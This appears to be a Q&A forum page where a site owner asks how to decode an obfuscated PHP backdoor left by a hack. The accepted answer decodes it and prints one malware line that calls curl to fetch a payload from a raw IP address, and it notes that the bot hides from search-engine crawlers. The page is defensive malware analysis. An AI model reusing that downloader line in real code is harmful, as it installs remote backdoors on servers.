dongyu4455 2012-09-28 22:12
浏览 64
已采纳

无法解码此黑客代码[已关闭]

Today my sites were hacked and here is one of php scripts I found : https://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE .

I changed eval to print in this code but I'm not able to decode the source code of the script.

I want to see what this script was doing for 1 week in my sites. I figured it out due to site denial attack from these scripts which ultimately changed the .htaccess code.

I've even tried to find any know common threats in Google using the script names and comment lines but I found none.

  • 写回答

2条回答 默认 最新

  • donjao6770 2012-09-28 22:46
    关注

    Disclaimer

    After Decoding i arrived at http://pastebin.com/VGqeGDkH. Please don't run the above code on your system ... because it not the only fine that would be downloaded to your system.

    The hacker sends curl or file_get_contents request to :

    curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");

    After decoding you would get

    curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");

    This would then download files and different back door to the system ..

    The hacker also used a lot of advance methods such as encryption , variable recursion , and plenty backup .. He also made sure that the final bot was not discovered by Google , Yahoo , Microsoft Corp , AMAZON , UCSD.EDU , Indiana University , Sonic.net , MCAFEE INTERNATIONAL , and hz

    My Advice

    Contact your hosting company or a Security Professional .. Your server needs to be checked

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

悬赏问题

  • ¥15 企业资源规划ERP沙盘模拟
  • ¥15 树莓派控制机械臂传输命令报错,显示摄像头不存在
  • ¥15 前端echarts坐标轴问题
  • ¥15 CMFCPropertyPage
  • ¥15 ad5933的I2C
  • ¥15 请问RTX4060的笔记本电脑可以训练yolov5模型吗?
  • ¥15 数学建模求思路及代码
  • ¥50 silvaco GaN HEMT有栅极场板的击穿电压仿真问题
  • ¥15 谁会P4语言啊,我想请教一下
  • ¥15 这个怎么改成直流激励源给加热电阻提供5a电流呀